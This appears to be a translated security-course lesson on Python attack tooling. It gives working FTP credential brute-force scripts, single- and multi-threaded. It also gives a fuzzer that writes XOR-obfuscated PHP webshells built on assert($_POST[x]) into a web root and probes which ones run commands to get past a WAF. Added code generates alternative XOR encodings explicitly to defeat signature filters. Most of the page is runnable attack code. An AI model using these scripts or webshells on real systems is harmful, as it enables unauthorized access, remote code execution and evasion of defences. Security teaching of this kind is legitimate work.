  • 78: Python Development - Multithreaded Fuzz & WAF XOR Evasion & Brute Force

    Topics covered in this lesson:
    • Protocol modules, the requests crawler library, simple multithreading, encoding, and backdoor WAF-bypass techniques
    Learning goals:
    • Use the protocol modules to connect to and operate on services (brute force, exploitation, etc.), and combine them with fuzzing to get past a WAF
    Case 1: a simple multithreaded script
    • Using the queue and threading modules

    Case 2: an FTP brute-force script built on the ftplib module

    • 1. Using the ftplib module
    • 2. Iterating over the username and password dictionaries
    • 3. Attempting the login and executing a command to confirm success
    # Author:Serena
    
    import ftplib
    
    # Simple login test
    # Brute force: IP, port, username, password dictionaries
    
    def ftp_brute():
        ftp = ftplib.FTP()
    
        for username in open('ftp-user.txt'):
            username = username.strip()          # drop the trailing newline
            for password in open('ftp-pwd.txt'):
                password = password.strip()
                # print(username + '|' + password)
                try:
                    ftp.connect('192.168.56.110', 21, timeout=5)
                    ftp.login(username, password)
                    print(username + '|' + password + '| ok')
                    # retrlines('LIST') prints the directory listing to stdout and
                    # returns the server's final response line (e.g. '226 Transfer complete')
                    resp = ftp.retrlines('LIST')
                    print(resp)
                except ftplib.all_errors:
                    pass
                finally:
                    ftp.close()     # release the socket whether or not the login succeeded
    
    if __name__ == '__main__':
        ftp_brute()
    ftp_brute (single-threaded)
    # Author:Serena
    
    import ftplib, sys, queue, threading
    
    # Simple login test
    # Brute force: IP, port, username, password dictionaries
    
    def ftp_brute(ip, port):
        while True:
            try:
                creds = q.get_nowait()    # get_nowait avoids the empty()/get() race between threads
            except queue.Empty:
                return
            username, password = creds.split('|', 1)
            ftp = ftplib.FTP()
            try:
                # reconnect for every attempt: many servers drop the control
                # connection after a failed login
                ftp.connect(ip, port, timeout=5)
                ftp.login(username, password)
                print(username + '|' + password + '| ok')
                resp = ftp.retrlines('LIST')     # prints the listing, returns the final response line
                print(resp)
            except ftplib.all_errors:
                print(username + '|' + password + '| no')
            finally:
                ftp.close()
    
    if __name__ == '__main__':
        ip = sys.argv[1]
        port = int(sys.argv[2])
        userfile = sys.argv[3]
        passfile = sys.argv[4]
        threading_num = int(sys.argv[5])
        q = queue.Queue()
        for username in open(userfile):
            username = username.strip()
            for password in open(passfile):
                password = password.strip()
                # print(username + '|' + password)
                q.put(username + '|' + password)
    
        threads = []
        for x in range(threading_num):
            t = threading.Thread(target=ftp_brute, args=(ip, port))
            t.start()
            threads.append(t)
        for t in threads:
            t.join()
    
    # Run from the command line: python3 test.py 192.168.56.110 21 ftp-user.txt ftp-pwd.txt 10
    # Possible improvement: stop once a valid username/password pair has been found
    ftp_brute (multi-threaded)
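    The multithreaded brute-forcer above leaves the early stop from its closing comment as an exercise. Below is an added example (not code from the original lesson) of the queue-plus-threading pattern of Case 1 with that optimization built in: workers pull credential pairs with get_nowait(), and a threading.Event stops every worker as soon as one succeeds. The authenticator is a constructed stand-in for ftp.login() that accepts exactly one pair, so the example runs offline; the function names, the sample word lists and the "admin"/"P@ssw0rd" hit are all assumptions made for the demonstration.

```python
import queue
import threading
from typing import Callable, Iterable, Optional, Tuple

Cred = Tuple[str, str]


def fill_queue(users: Iterable[str], passwords: Iterable[str]) -> "queue.Queue[Cred]":
    """Build the work queue once, in the main thread, before any worker starts.
    Blank lines in the word lists are skipped, trailing newlines stripped."""
    q: "queue.Queue[Cred]" = queue.Queue()
    pw = [p.strip() for p in passwords if p.strip()]
    for u in users:
        u = u.strip()
        if not u:
            continue
        for p in pw:
            q.put((u, p))
    return q


def run_pool(q: "queue.Queue[Cred]", check: Callable[[str, str], bool], threads: int = 10):
    """Drain q with `threads` workers and stop all of them as soon as one finds a hit.

    Returns (hit_or_None, number_of_attempts_actually_made)."""
    found = threading.Event()
    result: list = []           # the winning pair is appended here
    lock = threading.Lock()
    attempts = [0]

    def worker() -> None:
        while not found.is_set():
            try:
                user, pwd = q.get_nowait()   # no empty()/get() race: Empty is handled here
            except queue.Empty:
                return
            with lock:
                attempts[0] += 1
            try:
                ok = check(user, pwd)
            except Exception:                # connection errors etc. count as "not this one"
                ok = False
            if ok and not found.is_set():
                with lock:
                    result.append((user, pwd))
                found.set()                  # every other worker exits on its next loop check
                return

    ts = [threading.Thread(target=worker) for _ in range(threads)]
    for t in ts:
        t.start()
    for t in ts:
        t.join()
    return (result[0] if result else None), attempts[0]


# Constructed stand-in for ftp.login(): the fake "server" accepts exactly one pair.
def fake_login(user: str, pwd: str) -> bool:
    return (user, pwd) == ("admin", "P@ssw0rd")


# Constructed sample word lists, written the way they come out of open(): one entry per line.
USERS = ["root\n", "admin\n", "ftp\n"]
PASSWORDS = ["123456\n", "password\n", "P@ssw0rd\n", "admin\n", "letmein\n"]


def demo() -> Tuple[Optional[Cred], int, int]:
    q = fill_queue(USERS, PASSWORDS)
    total = q.qsize()
    hit, attempts = run_pool(q, fake_login, threads=4)
    return hit, attempts, total


if __name__ == "__main__":
    hit, attempts, total = demo()
    print(f"hit={hit} attempts={attempts} of {total}")
```

    To use it against a lab host, replace fake_login with a function that does ftp.connect()/ftp.login() and returns True on success; because failures are caught inside the worker, a server that drops the connection after a bad login only costs that one attempt.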

    Case 3: fuzz-generated XOR webshells that evade detection

    • 1. How the XOR-obfuscated shell works and how to develop one (reference examples: !^@, "^? and so on). In PHP, ^ applied to two strings XORs them byte by byte, so ('!'^'@') evaluates to 'a' (0x21 ^ 0x40 = 0x61) and ('!'^'@').'ssert' is the string 'assert' without the word ever appearing in the file.
    • 2. Generate a large number of payload variants by fuzzing the operand pair, name them in order and write them into the web root
    • 3. Use multithreading to request every shell file and submit a test command to see which ones execute and echo back
    Caveat: the generated shells rely on assert() executing a string argument and on the bare constant x in $_POST[x]; both work on PHP 7 (assert() also needs zend.assertions=1) but not on PHP 8, where assert() no longer evaluates strings and reading an undefined constant throws an Error.
    # Author:Serena
    import time
    import requests
    import threading, queue
    
    def bypass_check():
        while True:
            try:
                filename = q.get_nowait()
            except queue.Empty:
                return
            url = "http://127.0.0.1:8081/x/" + filename
            datas = {
                'x': 'phpinfo();'      # key must match $_POST[x] in the generated shell (no trailing space)
            }
            try:
                result = requests.post(url, data=datas, timeout=5).content.decode('utf-8', 'replace')
            except requests.RequestException:
                result = ''
            # "XIAODI-PC" is the hostname shown by phpinfo() on the lecturer's lab machine; change it to yours
            if "XIAODI-PC" in result:
                print('check ->' + filename + '->ok')
            else:
                print('check ->' + filename + '->no')
            time.sleep(1)
    
    if __name__ == '__main__':
        q = queue.Queue()
        for i in range(1, 127):
            for ii in range(1, 127):
                # PHP XORs the two one-byte strings; only pairs with i ^ ii == ord('a') (e.g. '!'^'@')
                # produce 'assert', and pairs containing a quote or backslash break the PHP syntax
                payload = "'" + chr(i) + "'" + "^" + "'" + chr(ii) + "'"
                code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
                filename = str(i) + 'xd' + str(ii) + '.php'
                q.put(filename)
                with open('D:/phpstudy/WWW/x/' + filename, 'w') as f:   # 'w', so a re-run does not append duplicates
                    f.write(code)
        print("Fuzz files generated successfully")
        for x in range(20):
            t = threading.Thread(target=bypass_check)
            t.start()
    Bypass
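    As an added example that is not part of the original lesson, the following Python models PHP's string XOR offline so the operand pairs can be enumerated and checked before anything is written to a web root, instead of generating all 126 x 126 files and letting the server sort them out. It generalizes the page's single-character trick to any word, skips the quote and backslash bytes that break a single-quoted PHP literal, and counts how many of the page's fuzz candidates actually spell 'assert'. The shell template follows the page's, with the POST index quoted; the function names and the regex are mine.

```python
import re

# Bytes that cannot appear unescaped inside a single-quoted PHP string literal.
PHP_STRING_BREAKERS = {ord("'"), ord("\\")}


def php_xor(a: bytes, b: bytes) -> bytes:
    """Model of PHP's `$a ^ $b` on two strings: bytewise XOR, truncated to the shorter operand."""
    return bytes(x ^ y for x, y in zip(a, b))


def xor_pairs_for_char(target: str, lo: int = 33, hi: int = 126):
    """All unordered pairs (a, b) of printable ASCII chars with chr(a) ^ chr(b) == target
    that are safe to place inside a single-quoted PHP literal."""
    t = ord(target)
    pairs = []
    for a in range(lo, hi + 1):
        b = a ^ t                       # the only partner of a that XORs to target
        if a < b <= hi and a not in PHP_STRING_BREAKERS and b not in PHP_STRING_BREAKERS:
            pairs.append((chr(a), chr(b)))
    return pairs


def build_xor_expr(word: str, pick: int = 0) -> str:
    """PHP expression such as ('!'^'@').('!'^'R') that evaluates to `word`.
    `pick` selects which candidate pair is used for every character, so a different
    pick yields a differently-looking payload for the same word (useful against
    signature-based filters that learned one specific pair)."""
    parts = []
    for ch in word:
        cands = xor_pairs_for_char(ch)
        if not cands:
            raise ValueError(f"no printable XOR pair for {ch!r}")
        a, b = cands[pick % len(cands)]
        parts.append(f"('{a}'^'{b}')")
    return ".".join(parts)


PAIR_RE = re.compile(r"\('(.)'\^'(.)'\)")


def eval_xor_expr(expr: str) -> str:
    """Evaluate an expression built by build_xor_expr with the PHP XOR model,
    i.e. the string the PHP engine ends up with after concatenating the XOR results."""
    return "".join(
        php_xor(a.encode(), b.encode()).decode() for a, b in PAIR_RE.findall(expr)
    )


def build_shell(word: str = "assert", pick: int = 0) -> str:
    """The page's shell template with the whole function name XOR-encoded
    and the POST index quoted (hypothetical helper, not the page's generator)."""
    return "<?php $a=" + build_xor_expr(word, pick) + ";$a($_POST['x']);?>"


def count_fuzz_hits(target: str = "a", lo: int = 1, hi: int = 126):
    """Replicates the page's fuzz loop over chr(1)..chr(126): how many ordered (i, ii)
    candidates XOR to `target` at all, and how many of those also survive the
    single-quote syntax check. Returns (all_hits, syntactically_valid_hits)."""
    t = ord(target)
    hits = [(i, i ^ t) for i in range(lo, hi + 1) if lo <= (i ^ t) <= hi]
    valid = [p for p in hits if not (set(p) & PHP_STRING_BREAKERS)]
    return len(hits), len(valid)


if __name__ == "__main__":
    expr = build_xor_expr("assert")
    print(expr, "->", eval_xor_expr(expr))
    print(build_shell())
    print("fuzz candidates that produce 'a' (all, syntactically valid):", count_fuzz_hits())
```

    Of the 15,876 files the page's loop writes, only the pairs whose bytes XOR to 0x61 produce a working shell, so checking the pairs locally first replaces most of the HTTP round trips with arithmetic; the remaining candidates can then be tested against the WAF the way Case 3 does.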

    Resources referenced:

    • fuzzdb (https://github.com/zhanye/fuzzdb)
    • fuzzDicts (https://github.com/stemmm/fuzzDicts)
    • Webshell evasion and WAF bypass (https://www.cnblogs.com/liujizhou/p/11806497.html)
    • Python ftplib module (https://www.cnblogs.com/kaituorensheng/p/4480512.html)
    • PHP XOR (https://blog.csdn.net/qq_41617034/article/details/104441032)
    • https://pan.baidu.com/s/13y3U6jX3WUYmnfKnXT8abQ, extraction code: xiao
     
  • Original article: https://www.cnblogs.com/zhengna/p/15074706.html